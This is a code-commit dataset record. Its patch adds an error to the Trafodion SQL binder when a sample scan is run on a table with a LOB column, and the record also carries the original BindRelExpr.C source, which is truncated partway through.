Dataset columns:

  patch   string   lengths 17 .. 31.2k
  y       int64    1 .. 1
  oldf    string   lengths 0 .. 2.21M
  idx     int64    1 .. 1
  id      int64    4.29k .. 68.4k
  msg     string   lengths 8 .. 843
  proj    string   212 distinct values
  lang    string   9 distinct values
patch:

@@ -7469,7 +7469,14 @@ RelExpr *Scan::bindNode(BindWA *bindWA)
       bindWA->setErrStatus();
       return NULL;
     }
-
+  if (naTable->hasLobColumn() && isSampleScan())
+    {
+      *CmpCommon::diags() << DgSqlCode(-4322)
+                          << DgTableName(
+                            naTable->getTableName().getQualifiedNameAsAnsiString());
+      bindWA->setErrStatus();
+      return NULL;
+    }
   // restricted partitions for HBase table
   if (naTable->isHbaseTable() &&
       (naTable->isPartitionNameSpecified() ||
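The patch above follows the binder's usual error convention: record a diagnostic naming the offending table, mark the bind as failed via setErrStatus(), and return early from bindNode(). Below is a minimal, self-contained C++ sketch of that pattern for illustration only; DiagArea, BindState, TableInfo, and bindScan are hypothetical stand-ins, not Trafodion APIs.

  // Illustration only: hypothetical stand-ins, not Trafodion classes.
  #include <iostream>
  #include <string>
  #include <vector>

  struct Diag { int sqlCode; std::string tableName; };

  // Stand-in for CmpCommon::diags(): accumulates diagnostics for the statement.
  struct DiagArea {
    std::vector<Diag> entries;
    void add(int code, const std::string &tbl) { entries.push_back({code, tbl}); }
  };

  // Stand-in for BindWA: carries bind-time state, including the error flag.
  struct BindState {
    DiagArea diags;
    bool err = false;
    void setErrStatus() { err = true; }
  };

  struct TableInfo { std::string name; bool hasLobColumn; };

  // Reject a SAMPLE scan over a table that has a LOB column:
  // record the diagnostic, mark the bind as failed, and stop early.
  bool bindScan(BindState &bindWA, const TableInfo &tbl, bool isSampleScan) {
    if (tbl.hasLobColumn && isSampleScan) {
      bindWA.diags.add(-4322, tbl.name);
      bindWA.setErrStatus();
      return false;
    }
    return true;  // binding of this node may continue
  }

  int main() {
    BindState bindWA;
    TableInfo t{"TRAFODION.SCH.T_WITH_LOB", true};
    if (!bindScan(bindWA, t, /*isSampleScan=*/true))
      std::cout << "bind error " << bindWA.diags.entries[0].sqlCode
                << " on table " << bindWA.diags.entries[0].tableName << "\n";
    return 0;
  }
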
y: 1

oldf:
/********************************************************************** // @@@ START COPYRIGHT @@@ // // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // // @@@ END COPYRIGHT @@@ **********************************************************************/ /* -*-C++-*- ****************************************************************************** * * File: BindRelExpr.C * Description: Relational expressions (both physical and logical operators) * Methods related to the SQL binder * * Created: 5/17/94 * Language: C++ * * * * It is the secret sympathy, * The silver link, the silken tie, * Which heart to heart, and mind to mind, * In body and in soul can bind. * -- Sir Walter Scott, * "The Lay of the Last Minstrel" * ****************************************************************************** */ #define SQLPARSERGLOBALS_FLAGS // must precede all #include's #define SQLPARSERGLOBALS_NADEFAULTS #include "Platform.h" #include "NAWinNT.h" #include "Sqlcomp.h" #include "AllItemExpr.h" #include "AllRelExpr.h" #include "BindWA.h" #include "ComOperators.h" #include "ComTransInfo.h" #include "ComLocationNames.h" #include "ControlDB.h" #include "Debug.h" #include "ex_error.h" #include "GroupAttr.h" #include "ParNameLocList.h" #include "parser.h" #include "Rel3GL.h" #include "RelDCL.h" #include "RelPackedRows.h" #include "RelSequence.h" #include "ShowSchema.h" // GetControlDefaults class #include "StmtDDLAddConstraintCheck.h" #include "StmtDDLCreateView.h" #include "ElemDDLColRefArray.h" #include "ElemDDLSaltOptions.h" #include "desc.h" #include "UdrErrors.h" #include "SequenceGeneratorAttributes.h" #include "wstr.h" #include "Inlining.h" #include "Triggers.h" #include "TriggerDB.h" #include "MVInfo.h" #include "Refresh.h" #include "ChangesTable.h" #include "MvRefreshBuilder.h" #include "OptHints.h" #include "CmpStatement.h" #include "OptimizerSimulator.h" #include "charinfo.h" #include "UdfDllInteraction.h" #include "SqlParserGlobals.h" // must be last #include #include "ItmFlowControlFunction.h" #include "ComSchemaName.h" // for ComSchemaName #include "ItemSample.h" #include "NAExecTrans.h" #include "HDFSHook.h" #include "CmpSeabaseDDL.h" #include "ComUser.h" #include "ComSqlId.h" #include "PrivMgrCommands.h" #include "PrivMgrComponentPrivileges.h" #include "PrivMgrDefs.h" #include "PrivMgrMD.h" #define SLASH_C '/' NAWchar *SQLTEXTW(); // ----------------------------------------------------------------------- // external declarations // ----------------------------------------------------------------------- // // ----------------------------------------------------------------------- // static functions // ----------------------------------------------------------------------- #ifdef NDEBUG THREAD_P NABoolean GU_DEBUG = FALSE; #else THREAD_P NABoolean GU_DEBUG; #endif static 
void GU_DEBUG_Display(BindWA *bindWA, GenericUpdate *gu, const char *text, RelExpr *reDown = NULL, NABoolean preEndl = FALSE, NABoolean postEndl = FALSE) { #ifndef NDEBUG if (!GU_DEBUG) return; // LCOV_EXCL_START - dpm if (preEndl) cerr << endl; cerr << "---" << endl; if (gu->getTableDesc()) { NAString tmp; ValueIdList vtmp(gu->getTableDesc()->getColumnList()); vtmp.unparse(tmp); cerr << gu->getUpdTableNameText() << " this>td(" << text << ") " << gu->getTableDesc()->getCorrNameObj().getExposedNameAsAnsiString() << " " << tmp << endl; } RETDesc *rd = gu->getRETDesc(); if (rd) { cerr << gu->getUpdTableNameText() << " this>grd(" << text << ") " << flush; rd->display(); } if (reDown) RETDesc::displayDown(reDown); if (bindWA->getCurrentScope()->getRETDesc() && bindWA->getCurrentScope()->getRETDesc() != rd) { cerr << gu->getUpdTableNameText() << " bwa>cs>grd(" << text << ") " <<flush; bindWA->getCurrentScope()->getRETDesc()->display(); } // LCOV_EXCL_STOP if (postEndl) cerr << endl; #endif } // GU_DEBUG_Display() #pragma nowarn(770) // warning elimination static RETDesc *bindRowValues(BindWA *bindWA, ItemExpr *exprTree, ValueIdList &vidList, RelExpr *parent, NABoolean inTrueRoot) { // Before we convert the row value expressions into a ValueIdList, save the // original value expression root nodes in an ItemExprList. // ItemExprList exprList(exprTree, bindWA->wHeap()); // // Bind the row value expressions and create a ValueIdList. // exprTree->convertToValueIdList(vidList, bindWA, ITM_ITEM_LIST, parent); if (bindWA->errStatus()) return NULL; // Set up context flags. // We are in a subquery if the previous scope's flag is set, note. // BindScope *currScope = bindWA->getCurrentScope(); BindScope *prevScope = bindWA->getPreviousScope(currScope); NABoolean inSelectList = currScope->context()->inSelectList(); NABoolean inInsert = currScope->context()->inInsert(); NABoolean inSubquery = FALSE; if (prevScope) inSubquery = prevScope->context()->inSubquery(); // See if UDF_SUBQ_IN_AGGS_AND_GBYS is enabled. It is enabled if the // default is ON, or if the default is SYSTEM and ALLOW_UDF is ON. NABoolean udfSubqInAggGrby_Enabled = FALSE; DefaultToken udfSubqTok = CmpCommon::getDefault(UDF_SUBQ_IN_AGGS_AND_GBYS); if ((udfSubqTok == DF_ON) || (udfSubqTok == DF_SYSTEM)) udfSubqInAggGrby_Enabled = TRUE; // See if ALLOW_MULTIDEGREE_SUBQ_IN_SELECTLIST is enabled. It is // enabled if the default is ON, or if the default is SYSTEM and // ALLOW_UDF is ON. NABoolean allowMultiDegSubqInSelect_Enabled = FALSE; DefaultToken allowMultiDegreeTok = CmpCommon::getDefault(ALLOW_MULTIDEGREE_SUBQ_IN_SELECTLIST); if ((allowMultiDegreeTok == DF_ON) || (allowMultiDegreeTok == DF_SYSTEM)) allowMultiDegSubqInSelect_Enabled = TRUE; // // Create the result table. // If a row value expression is not a column reference and does not have // a rename AS clause, the column is an unnamed expression. 
// RETDesc *resultTable = new (bindWA->wHeap()) RETDesc(bindWA); CollIndex j = 0; for (CollIndex i = 0; i < exprList.entries(); i++, j++) { ItemExpr *itemExpr = (ItemExpr *) exprList[i]; ValueId valId = itemExpr->getValueId(); ValueId boundValId = vidList[j]; CMPASSERT(boundValId != NULL_VALUE_ID); if (inSelectList && inTrueRoot && (boundValId.getType().getTypeQualifier() == NA_UNKNOWN_TYPE)&& (boundValId.getItemExpr()->getOperatorType() == ITM_CONSTANT)) { ConstValue * constItemExpr = (ConstValue*) boundValId.getItemExpr(); if (constItemExpr->isNull()) boundValId.coerceType(NA_NUMERIC_TYPE) ; } switch (itemExpr->getOperatorType()) { case ITM_REFERENCE: { ColReference *colRef = (ColReference *) itemExpr; const ColRefName &colRefName = colRef->getColRefNameObj(); CMPASSERT(valId != NULL_VALUE_ID || colRefName.isStar()); if (colRefName.isStar()) { const ColumnDescList *star = colRef->getStarExpansion(); CMPASSERT(star != NULL); const ColumnDescList &starExpansion = *star; CMPASSERT(starExpansion.entries() > 0); // ColRef::bind chked this alrdy CMPASSERT(inSelectList); resultTable->addColumns(bindWA, starExpansion); j += starExpansion.entries() - 1; } // isStar else { // Do another xcnm lookup so the column we add to our resultTable // will have its CorrName object correct // (e.g., in "SELECT TL.B,* FROM TA TL,TA TR ORDER BY B;" // colref TL.B will resolve to TL.B, not CAT.SCH.TL.B) // and its heading (Genesis 10-980126-5495). BindScope *bindScope; ColumnNameMap *xcnmEntry = bindWA->findColumn(colRefName, bindScope); if (NOT xcnmEntry) // ## I don't recall when this case occurs... resultTable->addColumn(bindWA, colRefName, boundValId, colRef->getTargetColumnClass()); else resultTable->addColumn(bindWA, xcnmEntry->getColRefNameObj(), boundValId, colRef->getTargetColumnClass(), // MV -- xcnmEntry->getColumnDesc()->getHeading()); } break; } case ITM_RENAME_COL: { RenameCol *renameCol = (RenameCol *) itemExpr; const ColRefName &colRefName = *renameCol->getNewColRefName(); CMPASSERT(NOT colRefName.isStar()); const char * heading = NULL; // if this rename was for a BLOB/CLOB column from JDBC, return // the heading of the child base column. This is needed for JDBC // as it uses the heading to figure out if the column is a LOB // column. if (CmpCommon::getDefault(JDBC_PROCESS) == DF_ON) { ItemExpr * childExpr = itemExpr->child(0)->castToItemExpr(); if (childExpr->getOperatorType() == ITM_BASECOLUMN) { heading = ((BaseColumn *)childExpr)->getNAColumn()->getHeading(); if (heading) { if ((strcmp(heading, "JDBC_BLOB_COLUMN -") != 0) && (strcmp(heading, "JDBC_CLOB_COLUMN -") != 0)) heading = NULL; } } } // No heading is passed here (whole point of SQL derived-column is rename) // unless it is a jdbc blob/clob heading. resultTable->addColumn(bindWA, colRefName, boundValId, renameCol->getTargetColumnClass(), heading); break; } case ITM_ROW_SUBQUERY: case ITM_USER_DEF_FUNCTION: { // Deal with multi Valued User Defined Functions or Subqueries with // degree > 1. // // In order to have the correct degree during the bind phase, // since we don't have all the information until after the transform // phase, we need to put entries into the RETDesc early. // // Say you have a query like this: // select mvf(a,b) from t1; // and assume mvf outputs 2 values. // // at bind time, the select list will only have 1 entry in it, namely // the ITM_USER_DEF_FUNCTION. // Since we do degree checking at bind time, we need to know now that // mvf() actually produces 2 values. 
// // So what we do here, is that we substitute the original // ITM_USER_DEF_FUNCTION with ValueIdProxies. One for each output of // the original function. The selectList of the RelRoot as well as the // retDESC are updated with the additional elements. // // Similarly if we have a subquery like this: // // select (select max(a),max(b) from t2), a from t1; // // we will wrap the subquery in a ValeIdProxy representing the // subquery from a transformation point of view, but representing // max(a) from an output point of view. A second ValueIdProxy will be // added for max(b), so the select list of the outer query would look // like this: // // [ ValueIdProxy(Subq:max(a)), ValueIdProxy(Subq:max(b)), a ] // // instead of just // // [ Subq, a ] // // like we are used to. // // At transform time the valueIdProxies, will disappear and we will // transform the UDF/Subquery carried inside the valueIdProxy // marked to be transformed. Some might hang around until Normalization. // Only the ValueIdProxy representing the first output will be marked // to be transformed, so we only transform the UDF/Subquery once. // // Similarly, we update the outer query's retDESC. NABoolean isSubquery = (itemExpr->getOperatorType() == ITM_ROW_SUBQUERY) ? TRUE : FALSE; NAColumnArray outCols; ValueIdList outColVids; CollIndex currIndex = j; if (isSubquery) { Subquery * subq = (Subquery *) itemExpr; const RETDesc *retDesc = subq->getSubquery()->getRETDesc(); if( retDesc ) { retDesc->getColumnList()->getValueIdList(outColVids); } } else { UDFunction * udf = (UDFunction *) itemExpr; CMPASSERT(udf->getRoutineDesc()); const RoutineDesc *rDesc = udf->getRoutineDesc(); // Get the outputs of this UDF, these are as defined in metadata // including names etc. outCols = rDesc->getEffectiveNARoutine()->getOutParams(); outColVids = rDesc->getOutputColumnList(); } if ( (outColVids.entries() == 1) || ( isSubquery && (!allowMultiDegSubqInSelect_Enabled) )) { // Do exactly what we used to do if the degree is 1. // or we have disallowed subqueries of degree > 1. if (isSubquery) { // ## Here we ought to manufacture a unique name per Ansi 7.9 SR 9c. ColRefName colRefName; resultTable->addColumn(bindWA, colRefName, boundValId); } else { NAColumn *col = outCols[0]; const char * heading = col->getHeading(); ColRefName colRefName( col->getColName()); ColumnClass colClass( col->getColumnClass()); resultTable->addColumn(bindWA, colRefName, boundValId, colClass, heading); } break; } // Wrap all the outputs with a ValueIdProxy // so that we can deal with multiple outputs // If we didn't have a RETDesc or a RoutineDesc, outColVids // will be empty and we don't do anything. // Also we do not need to worry about recursing through the // RETDesc entries as the call to convertToValueIdList() above // did that already. for (CollIndex idx = 0; idx < outColVids.entries(); idx++) { NAColumn *col; NABoolean isRealOrRenameColumn = (outColVids[idx].getItemExpr()->getOperatorType() == ITM_BASECOLUMN) || (outColVids[idx].getItemExpr()->getOperatorType() == ITM_RENAME_COL) || !isSubquery ? TRUE : FALSE; if (isSubquery) { col = ((NAColumn *) outColVids[idx].getItemExpr()); } else { col = ((NAColumn *) outCols[idx]); } const char * heading = isRealOrRenameColumn ? col->getHeading() : ""; ColRefName colRefName( isRealOrRenameColumn ? col->getColName() : ""); ColumnClass colClass( isRealOrRenameColumn ? col->getColumnClass() : USER_COLUMN); // We are wrapping the MVF/Subquery and its additional outputs // with a ValueIdProxy. 
This way we don't end up flattening or // expanding the outputs of the MVF multiple times. // The valueId of the RoutineParam corresponding to the // metadata column is used for the output valueId. // So if you had a query like this: // // select swap2(a,b) from t1; // // and swap2() returns 2 outputs (basically the inputs swapped) // // The new select list for the query would be: // // 1: ValueIdProxy with the derivedNode being swap2, and output // valueId containing the first output parameter of swap2. // Also the transformDerivedFrom flag would be set // 2: ValueIdProxy with the derivedNode being swap2, and output // valueId containing the second output parameter of swap2. // // These ValueIdProxy nodes will go away at transform time.. ValueIdProxy *proxyOutput = new (CmpCommon::statementHeap()) ValueIdProxy( boundValId, outColVids[idx], idx); // The type of the proxy is the same as the output valueId associated // with it. proxyOutput = (ValueIdProxy *) proxyOutput->bindNode(bindWA); if (bindWA->errStatus()) return NULL; // Make sure we transform the MVF if (idx == 0) proxyOutput->setTransformChild(TRUE); if (!isSubquery || isRealOrRenameColumn) { resultTable->addColumn(bindWA, colRefName, proxyOutput->getValueId(), colClass, heading); } else { resultTable->addColumn(bindWA, colRefName, proxyOutput->getValueId()); } if (idx == 0) { vidList.removeAt(currIndex); // we need to delete the old valueId } else j++; // The first entry simply replaces the original // Update the list with the new value. // insertAt has the nice feature that it will push // the residual elements to the right, so we do not need to // manage the valueIds we haven't processed yet as long as we // update the index (j++ above) correctly. vidList.insertAt(currIndex++,proxyOutput->getValueId()); } break; } default: { // ## Here we ought to manufacture a unique name per Ansi 7.9 SR 9c. ColRefName colRefName; resultTable->addColumn(bindWA, colRefName, boundValId); break; } } // switch } // for // need this for static cursor declaration cmpCurrentContext->saveRetrievedCols_ = resultTable->getDegree(); // Before we can return the result table, we need to check for the possible // syntax error below, in which we can't use the definition of "inSubquery" // that we calculate above. Our example case is, if we're directly below // a GroupByAgg, then we need to look at the scope *before* the GroupByAgg // to determine if we satisfy the error condition below. This is a problem // with how our plan trees don't sync completely with SQL syntax. // Here's the error case (Genesis 10-980518-0765): // // >> select (select distinct 1,2 from T1 t) from T1; // // First of all, yes, it's a really stupid query. Oh well! :-) // // It's pretty clear that the "1,2" is part of a "select list inside the // subquery of a select list." However, the parser creates a GroupByAgg // for the distinct keyword (sigh), which means that we have an // additional scope between the scope of the SQLRecord (1,2) and the // scope of the "TRUE" parent, the inner-select. This additional scope // is for the GroupByAgg. So in the case of a GroupByAgg (and possibly // another case will arise later ...?), we need to look at the // GroupByAgg's parent to determine if we satisfy this error condition. // // To recap: To handle this one (stupid) case we've added a ton of // comments and code here and in GroupByAgg::bindNode(), plus created // the new functions/members BindWA::getSubqueryScope(), and // BindContext::lookAboveToDecideSubquery_/(). Wonderful! 
// if (prevScope) { BindScope *subQScope = bindWA->getSubqueryScope(currScope); // // subQScope should be non-NULL when prevScope is non-NULL // CMPASSERT(subQScope); NABoolean inSubqueryInSelectList = subQScope->context()->inSubquery() && subQScope->context()->inSelectList(); NABoolean inSubqueryInGroupByClause = subQScope->context()->inSubquery() && subQScope->context()->inGroupByClause() && (CmpCommon::getDefault(UDF_SUBQ_IN_AGGS_AND_GBYS) == DF_ON); //10-060602-6930 Begin //Added a check to not enter this condition when we are in bindView scope if (inSelectList && (inSubqueryInSelectList || inSubqueryInGroupByClause) && !bindWA->inViewExpansion()) { //10-060602-6930 End // We now can check for the syntax error that we've done so much work // above (and in GroupByAgg::bindNode(), BindWA.h & BindWA.cpp) // to detect: if ((j > 1) && (!allowMultiDegSubqInSelect_Enabled) ) { // 4019 The select list of a subquery in a select list must be scalar *CmpCommon::diags() << DgSqlCode(-4019); bindWA->setErrStatus(); return NULL; } } } // prevScope return resultTable; } // bindRowValues() #pragma warn(770) // warning elimination // Bind a constraint (MP Check Constraint). // Returns NULL if error in constraint *OR* we can safely ignore the constraint // (e.g., a NOT NULL NONDROPPABLE constraint); caller must check bindWA errsts. // static ItemExpr* bindCheckConstraint( BindWA *bindWA, CheckConstraint *constraint, const NATable *naTable, NABoolean catmanCollectUsages = FALSE, ItemExpr *viewCheckPred = NULL) { ItemExpr *constraintPred = NULL; if (viewCheckPred) { // view WITH CHECK OPTION: the view's where-clause was already parsed // in bindView CMPASSERT(constraint->getConstraintText().isNull()); // sanity check constraintPred = viewCheckPred; } else { Parser parser(bindWA->currentCmpContext()); constraintPred = parser.getItemExprTree(constraint->getConstraintText().data(), constraint->getConstraintText().length(), CharInfo::UTF8 // ComGetNameInterfaceCharSet() ); } if (constraintPred) { ParNameLocList *saveNameLocList = bindWA->getNameLocListPtr(); if (!catmanCollectUsages || !bindWA->getUsageParseNodePtr() || bindWA->getUsageParseNodePtr()->getOperatorType() == DDL_CREATE_VIEW) bindWA->setNameLocListPtr(NULL); CMPASSERT(!bindWA->getCurrentScope()->context()->inCheckConstraint()); bindWA->getCurrentScope()->context()->inCheckConstraint() = constraint; constraintPred->bindNode(bindWA); bindWA->setNameLocListPtr(saveNameLocList); bindWA->getCurrentScope()->context()->inCheckConstraint() = NULL; if (bindWA->errStatus()) { delete constraintPred; constraintPred = NULL; } } // A NOT NULL constraint on a single column which never allows nulls // (has no null indicator bytes) // -- i.e., the common case of a column declared NOT NULL NONDROPPABLE -- // does not need to be separately enforced as a constraint, because // Executor will raise a numeric-overflow error if someone tries to // put a NULL into such a column. // // So we don't need to put this constraint into the list, but we do need // to save its name, for run-time error diags. // // ##To be done: // ## GenRelUpdate DP2Insert/Update: for each col in newRecExpr(), // ## if getNotNullViolationCode(), then // ## save the SqlCode and the getNotNullConstraintName()...asAnsiString() // ## and some column identifier (pos or offset) in some per-query struct // ## Executor: if error 8411, if truly a NULL violation, look up that column // ## in the nnconstraint struct and populate diags with the info there. 
// if (constraintPred) { ItemExprList nncols(bindWA->wHeap()); constraintPred->getColumnsIfThisIsISNOTNULL(nncols); for (CollIndex i = 0; i < nncols.entries(); i++) { NAColumn *nacol = nncols[i]->getValueId().getNAColumn(); if (!nacol->getType()->supportsSQLnullPhysical()) { nacol->setNotNullNondroppable(constraint); // // DO *NOT* do: delete constraintPred; // -- it deletes a whole tree of stuff referenced elsewhere! // constraintPred = NULL; } else { // Leaving the column's type's supportsSQLnullPhysical() as is (TRUE), // set its supportsSQLnullLogical() to FALSE, // for the Transform phase. nacol->mutateType()->setNullable(TRUE/*supports physical nulls*/, FALSE/*but not logical nulls */); } } } else { *CmpCommon::diags() << DgSqlCode(-4025) << DgConstraintName(ToAnsiIdentifier(constraint->getConstraintName().getObjectName())) << DgTableName(naTable->getTableName().getQualifiedNameAsAnsiString()); bindWA->setErrStatus(); } return constraintPred; } // bindCheckConstraint() // LCOV_EXCL_START - cnu static ItemExpr *intersectColumns(const RETDesc &leftTable, const RETDesc &rightTable, BindWA* bindWA) { ItemExpr *predicate = NULL; for (CollIndex i = 0; i < leftTable.getDegree(); i++) { ItemExpr *leftExpr = leftTable.getValueId(i).getItemExpr(); ItemExpr *rightExpr = rightTable.getValueId(i).getItemExpr(); BiRelat *compare = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, leftExpr, rightExpr); if (predicate) predicate = new (bindWA->wHeap()) BiLogic(ITM_AND, predicate, compare); else predicate = compare; } // Binding this predicate must be done in caller's context/scope, not here... return predicate; } // intersectColumns() // LCOV_EXCL_STOP static ItemExpr *joinCommonColumns(const RelExpr *const leftRelExpr, const RelExpr *const rightRelExpr, BindWA* bindWA) { const RETDesc &leftTable = *leftRelExpr->getRETDesc(); const RETDesc &rightTable = *rightRelExpr->getRETDesc(); // // Find the common column names between two tables and create a predicate // that joins the columns. For example, if tables T1 and T2 have common // column names A and B, return the predicate T1.A = T2.A AND T1.B = T2.B. // The checking for ambiguous common columns will be done when they are // are coalesced for the output list. // ItemExpr *predicate = NULL; for (CollIndex i = 0; i < leftTable.getDegree(); i++) { ColRefName simpleColRefName(leftTable.getColRefNameObj(i).getColName()); // if (NOT simpleColRefName.isEmpty()) { // ColumnNameMap *commonCol = rightTable.findColumn(simpleColRefName); // if (commonCol) { // ItemExpr *leftExpr = leftTable.getValueId(i).getItemExpr(); ItemExpr *rightExpr = commonCol->getValueId().getItemExpr(); // bindWA->markAsReferencedColumn(leftExpr); bindWA->markAsReferencedColumn(rightExpr); BiRelat *compare = new (bindWA->wHeap()) BiRelat(ITM_EQUAL, leftExpr, rightExpr); if (predicate) predicate = new(bindWA->wHeap()) BiLogic(ITM_AND, predicate, compare); else predicate = compare; } } } // Binding this predicate is being done in caller, Join::bindNode() return predicate; } // joinCommonColumns() // Functions findNonCommonColumns() and coalesceCommonColumns() // // These create the column descriptors for the result of a natural join. // A natural join is equivalent to // // SELECT SLCC, SLT1, SLT2 FROM T1, T2 // // where SLCC represents the list of coalesced common columns of T1 and T2, // SLT1 represents the list of non-common columns of T1, and // SLT2 represents the list of non-common columns of T2. // // A coalesced common column C is equivalent to // // COALESCE (T1.C, T2.C) AS C -- i.e. 
there is no table name; CorrName is "" // // where COALESCE (T1.C, T2.C) is equivalent to // // CASE WHEN T1.C IS NOT NULL THEN T1.C ELSE T2.C END // // Function findNonCommonColumns(), on the first call, coalesces common // columns into the resultTable, and collects non-common columns. // On the second call it continues to collect non-common columns. // // Function coalesceCommonColumns() adds SLCC, SLT1, SLT2 to the // resultTable in the proper order. // static void findNonCommonColumns(BindWA *bindWA, OperatorTypeEnum joinType, const RETDesc &sourceTable, const RETDesc &targetTable, RETDesc &resultTable, ColumnDescList &nonCommonCols) { // Used for ANSI 6.4 SR 3aii below. CorrName implemDependCorr(bindWA->fabricateUniqueName(), TRUE); // for (CollIndex i = 0; i < sourceTable.getDegree(); i++) { const ColRefName &sourceColRefName = sourceTable.getColRefNameObj(i); ValueId sourceId = sourceTable.getValueId(i); ColRefName simpleColRefName(sourceColRefName.getColName()); // // If a column is an unnamed expression, it is a non-common column. // if (simpleColRefName.isEmpty()) nonCommonCols.insert(new (bindWA->wHeap()) ColumnDesc(sourceColRefName, sourceId, NULL, bindWA->wHeap())); else { ColumnNameMap *commonCol = targetTable.findColumn(simpleColRefName); // // If the named column does not have a corresponding column in the // target table, it is a non-common column. // if (NOT commonCol) nonCommonCols.insert(new (bindWA->wHeap()) ColumnDesc(sourceColRefName, sourceId, NULL, bindWA->wHeap())); // // If the target table has more than one corresponding column, error. // else if (commonCol->isDuplicate()) { NAString fmtdList(bindWA->wHeap()); LIST(TableNameMap*) xtnmList(bindWA->wHeap()); targetTable.getTableList(xtnmList, &fmtdList); // Tables in the RETDesc *CmpCommon::diags() << DgSqlCode(-4004) << DgColumnName(simpleColRefName.getColName()) << DgTableName(commonCol->getColRefNameObj().getCorrNameObj(). getExposedNameAsAnsiString()) << DgString0(fmtdList) << DgString1(bindWA->getDefaultSchema().getSchemaNameAsAnsiString()); bindWA->setErrStatus(); return; } else if (joinType != ITM_NO_OP) { // // Coalesce the common columns and add them to the result table. // ValueId resultId; switch(joinType) { case REL_JOIN: case REL_LEFT_JOIN: resultId = sourceId; break; case REL_RIGHT_JOIN: resultId = commonCol->getValueId(); break; default: { ItemExpr *sourceExpr = sourceId.getItemExpr(); ItemExpr *targetExpr = commonCol->getValueId().getItemExpr(); UnLogic *test = new (bindWA->wHeap()) UnLogic(ITM_IS_NULL, sourceExpr); ItemExpr *coalesce = new (bindWA->wHeap()) Case(NULL, new (bindWA->wHeap()) IfThenElse(test, targetExpr, sourceExpr)); coalesce = coalesce->bindNode(bindWA)->castToItemExpr(); if (bindWA->errStatus()) { delete test; delete coalesce; return; } resultId = coalesce->getValueId(); break; } // default case (braces required since vars are initialized here) } // switch // // ANSI 6.4 SR 3aii: // We've fabricated a unique implementation-dependent CorrName // outside the loop; the common columns have this basically // invisible CorrName, the point of which seems to be that // select * from // ta natural join tb // join -- not natural! // (ta tx natural join tb ty) // on 1=1; // should not generate an ambiguous column reference error // from the star-expansion. So according to ANSI, // the two natural joins produce, respectively, // fab1.slcc, ta.slt1, tb.slt2 // fab2.slcc, tx.slt1, ty.slt2 // so the join produces // fab1.slcc, ta.slt1, tb.slt2, fab2.slcc, tx.slt1, ty.slt2 // i.e. 
the two SLCC's are unambiguous. // ColRefName implemDepend(simpleColRefName.getColName(),implemDependCorr); resultTable.addColumn(bindWA, implemDepend, resultId); } // coalesce SLCC into resultTable } // named column } // for } // findNonCommonColumns() // Comments for this function can be found above the preceding function. static void coalesceCommonColumns(BindWA *bindWA, OperatorTypeEnum joinType, const RETDesc &leftTable, const RETDesc &rightTable, RETDesc &resultTable) { ColumnDescList nonCommonCols(bindWA->wHeap()); // non-common columns of the left table // // Coalesce the common column names of the left and right tables and add // them to the result table. // Collect the non-common column names from the left. // findNonCommonColumns(bindWA, joinType, leftTable, rightTable, resultTable, nonCommonCols); if (bindWA->errStatus()) return; // // Collect the non-common column names from the right. // RETDesc irrelevantOnThisCall; findNonCommonColumns(bindWA, ITM_NO_OP, // do not add SLCC to resultTable rightTable, leftTable, irrelevantOnThisCall, nonCommonCols); if (bindWA->errStatus()) return; // // Add the non-common columns from the left and right to the result table. // resultTable.addColumns(bindWA, nonCommonCols); nonCommonCols.clearAndDestroy(); // // Add the system columns from the left and right to the result table. // resultTable.addColumns(bindWA, *leftTable.getSystemColumnList(), SYSTEM_COLUMN); resultTable.addColumns(bindWA, *rightTable.getSystemColumnList(), SYSTEM_COLUMN); } // coalesceCommonColumns() // For Catalog Manager, this function: // 1) Fixes up the name location list to help with computing of the view text, // check constraint search condition text, etc. // 2) Collects the table (base table, view, etc.) usages information for // view definitions, check constraint definitions, etc. // // ** Some of this could be implemented, perhaps more simply, // ** using BindWA::viewCount() and BindWA::tableViewUsageList(). 
// static void BindUtil_CollectTableUsageInfo(BindWA *bindWA, const CorrName& corrName) { // Task (1) // ParNameLocList *pNameLocList = bindWA->getNameLocListPtr(); if (pNameLocList) { ParNameLoc * pNameLoc = pNameLocList->getNameLocPtr(corrName.getNamePosition()); if (pNameLoc) { if (NOT pNameLoc->getExpandedName(FALSE).isNull()) CMPASSERT(pNameLoc->getExpandedName() == corrName.getQualifiedNameObj().getQualifiedNameAsAnsiString()); pNameLoc->setExpandedName( corrName.getQualifiedNameObj().getQualifiedNameAsAnsiString()); } // // Task (2) // ExprNode *pUsageParseNode = bindWA->getUsageParseNodePtr(); if (pUsageParseNode) { if (pUsageParseNode->getOperatorType() == DDL_CREATE_VIEW) { StmtDDLCreateView &cvpn = *pUsageParseNode->castToElemDDLNode() ->castToStmtDDLCreateView(); ParTableUsageList &vtul = cvpn.getViewUsages().getViewTableUsageList(); vtul.insert(corrName.getExtendedQualNameObj()); } else if (pUsageParseNode->getOperatorType() == DDL_ALTER_TABLE_ADD_CONSTRAINT_CHECK) { StmtDDLAddConstraintCheck &node = *pUsageParseNode->castToElemDDLNode() ->castToStmtDDLAddConstraintCheck(); ParTableUsageList &tul = node.getTableUsageList(); tul.insert(corrName.getQualifiedNameObj()); } } } // if (pNameLocList) } // BindUtil_CollectTableUsageInfo() void castComputedColumnsToAnsiTypes(BindWA *bindWA, RETDesc *rd, ValueIdList &compExpr) { const ColumnDescList &cols = *rd->getColumnList(); CollIndex i = cols.entries(); CMPASSERT(i == compExpr.entries()); NAString tmp; // For a SELECT query that is part of a CREATE VIEW statement, force use of IEEE floating-point // because SQL/MX Catalog Manager does not support Tandem floating-point, and would return an // internal error if it is encountered. if (bindWA->inViewDefinition() || bindWA->inMVDefinition()) tmp = "IEEE"; else CmpCommon::getDefault(FLOATTYPE, tmp, -1); NABoolean outputFloattypeIEEE = ((tmp == "IEEE") || (CmpCommon::getDefault(ODBC_PROCESS) == DF_ON) || (CmpCommon::getDefault(JDBC_PROCESS) == DF_ON)); while (i--) { ColumnDesc *col = cols[i]; if (col->getValueId().getType().getTypeQualifier() == NA_ROWSET_TYPE) { return; } const NAType &naType = col->getValueId().getType(); // // Note: the unsupported and DATETIME cases are mutually exclusive with the LARGEDEC case below. // if 